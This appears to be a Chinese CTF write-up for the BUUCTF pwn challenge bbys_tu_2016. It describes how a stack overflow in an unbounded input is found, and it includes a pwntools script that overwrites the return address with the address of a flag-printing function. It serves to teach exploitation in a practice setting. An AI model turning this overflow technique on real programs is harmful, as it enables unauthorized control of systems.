[BUUCTF]PWN——bbys_tu_2016 - 走看看

zoukankan html css js c++ java

[BUUCTF]PWN——bbys_tu_2016
bbys_tu_2016

附件

步骤：
1. 例行检查，32位程序，开启了nx保护
2. 本地试运行一下程序，看看大概的情况，测试时候发现输入长度过长程序会崩溃，猜测输入点存在问题
3. 32位ida载入，检索程序里的字符串，发现有直接读出flag的函数可以利用
  flag_addr=0x804856D
4. main函数
  
  没有限制v4的长度，存在溢出漏洞，覆盖ret为读出flag的地址即可
```
from pwn import *

r=remote('node3.buuoj.cn',29593)

flag_addr=0x804856D

payload='a'*(0x14+4)+p32(flag_addr)

r.sendline(payload)

r.interactive()
```
查看全文

相关阅读:
NDBCLuster && MySQL Cluster 转
 Publisher FAQ | Readability: Enjoy Reading. Support Writing.
Eucalyptus Cloud Computing Software
Oracle Coherence
hbase note
使用python代码实现三叉搜索树高效率”自动输入提示”功能
 Facebook 的系统架构肇凯博客
 CentOS Linux 环境 Rails 安装记录
 linux socket网络编程进阶推荐阅读开源项目转
 HandlerSocket

原文地址：https://www.cnblogs.com/xlrp/p/14273663.html

Copyright © 2011-2022 走看看